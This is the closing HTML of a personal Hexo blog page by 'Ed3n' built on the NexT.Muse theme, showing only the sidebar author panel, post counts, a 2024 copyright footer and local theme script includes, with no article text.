      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Ed3n"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">Ed3n</p>
  <div class="site-description" itemprop="description">欢迎光临，我的朋友</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">8</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ed3n</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共26.2k字</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
